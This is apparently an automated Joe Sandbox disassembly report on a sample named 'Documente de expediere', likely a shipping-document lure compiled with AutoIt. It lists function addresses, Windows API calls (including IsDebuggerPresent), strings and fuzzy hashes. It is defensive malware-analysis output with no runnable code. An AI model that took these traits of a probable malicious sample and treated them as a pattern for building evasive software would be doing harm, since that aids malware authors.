                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                • _wcscat.LIBCMT ref: 006D50E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FullNamePath_memmove_wcscat
                                                • String ID: cu
                                                • API String ID: 257928180-2324572491
                                                • Opcode ID: 6b9c1b87b27f786a532337131380c833fcda5970becd0c95eb333970c7458d82
                                                • Instruction ID: ecdc0eee7f9da47c5cbaa867adbc63737ebdd790e1e9312c2f61a5420a64413e
                                                • Opcode Fuzzy Hash: 6b9c1b87b27f786a532337131380c833fcda5970becd0c95eb333970c7458d82
                                                • Instruction Fuzzy Hash: 2D1165359042089B9B81FB64CD01ED977BEEF09350B0040A9F949D7291EA75DF898B25
                                                Function 006E92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006E9355
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: b5484f24eb560e24f4dcb28ea8b96ddf881834035a7af277a5bd533cfb910a4e
                                                • Instruction ID: 57c547d36bb1bd1cf805d7b44424ddfd92e4c80b7c8270aade7d9dcff0b1a250
                                                • Opcode Fuzzy Hash: b5484f24eb560e24f4dcb28ea8b96ddf881834035a7af277a5bd533cfb910a4e
                                                • Instruction Fuzzy Hash: 37019E71A06314AB8F04EBA5CC928FE776EBF06320B140619F932676E2DB3569089664
                                                Function 006E91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 006E924D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 3ce2074c89893be85c66a9159f2c1d1786bb1becaf0ddb7413cfd3b56fc9187c
                                                • Instruction ID: ffc104ac53512dd50fda192439554b3021c168203affa99d047aee508db6d2c2
                                                • Opcode Fuzzy Hash: 3ce2074c89893be85c66a9159f2c1d1786bb1becaf0ddb7413cfd3b56fc9187c
                                                • Instruction Fuzzy Hash: D301D471A423047BCF04EBA1C992DFF73AE9F05300F240019BA12676D1EA156F0C9675
                                                Function 006E9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 006E92D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: ec747267dc8230c6548974f949e32e9abd82ea5c1722d6a760fc8ff79f8e4976
                                                • Instruction ID: 72dc108d9ac2ae9e73097fa70ca42499d7b907c2fd487f5a55a22a750b118bf8
                                                • Opcode Fuzzy Hash: ec747267dc8230c6548974f949e32e9abd82ea5c1722d6a760fc8ff79f8e4976
                                                • Instruction Fuzzy Hash: 1801F771A423047BCF00E6A5C982DFF73AE9F00300F240019B902676D1DB155F089679
                                                Function 006B6DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __calloc_crt
                                                • String ID: @Ru
                                                • API String ID: 3494438863-658108087
                                                • Opcode ID: 73b40c6363bc33376fa92a82675f62b2f115defd1f5105e92889bcb071325fdd
                                                • Instruction ID: 8240d25e32e057f0c2da3a268e3b05b711cef9e8c1224859add757292748bbcb
                                                • Opcode Fuzzy Hash: 73b40c6363bc33376fa92a82675f62b2f115defd1f5105e92889bcb071325fdd
                                                • Instruction Fuzzy Hash: 1FF04FB1B097169BE7649F18FD016E13796FB41721F50852AF101CB290EBBC88C18799
                                                Function 006F51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp
                                                • String ID: #32770
                                                • API String ID: 2292705959-463685578
                                                • Opcode ID: 6cb92cab7677c304bb8ce1d89766c2612d291b9a0e033c88e670b839e6b18fc7
                                                • Instruction ID: e8365104051d5c7ac32a4c2eb0ab2385e8db5736ee2ee6542944b470896d2ae4
                                                • Opcode Fuzzy Hash: 6cb92cab7677c304bb8ce1d89766c2612d291b9a0e033c88e670b839e6b18fc7
                                                • Instruction Fuzzy Hash: FEE02B7260022C26D7109699AC09AE7F7ACEB40721F00016BF910D3180E5649A4487D4
                                                Function 006E81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006E81CA
                                                  • Part of subcall function 006B3598: _doexit.LIBCMT ref: 006B35A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Message_doexit
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 1993061046-4017498283
                                                • Opcode ID: 2cffbecf086631e3e3eb277f7ab48d02cf638cd136ef177238f45779650ce4ac
                                                • Instruction ID: 80d9a4448ee5e98c59713b873a116cff98d6ba2ff822631cc1c779c10d3b5739
                                                • Opcode Fuzzy Hash: 2cffbecf086631e3e3eb277f7ab48d02cf638cd136ef177238f45779650ce4ac
                                                • Instruction Fuzzy Hash: C3D05B723C536C36D26433E96C07FC675494F15B51F504019FB08555D38ED555C243ED
                                                Function 006CB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006CB564: _memset.LIBCMT ref: 006CB571
                                                  • Part of subcall function 006B0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006CB540,?,?,?,0069100A), ref: 006B0B89
                                                • IsDebuggerPresent.KERNEL32(?,?,?,0069100A), ref: 006CB544
                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0069100A), ref: 006CB553
                                                Strings
                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006CB54E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                • API String ID: 3158253471-631824599
                                                • Opcode ID: cd59340c578646774db811852b980d474c4e5fb3165bfbfb54f9fe8ba8cf816b
                                                • Instruction ID: 83692c5f5c307df6aabf8c6375adfd00663f20f8d50afd82f6c2a660f7d6ca5d
                                                • Opcode Fuzzy Hash: cd59340c578646774db811852b980d474c4e5fb3165bfbfb54f9fe8ba8cf816b
                                                • Instruction Fuzzy Hash: 36E06DB02003118FE760EF28E4097927BE4EB00704F00C92CE446C3752DBB8E444CB65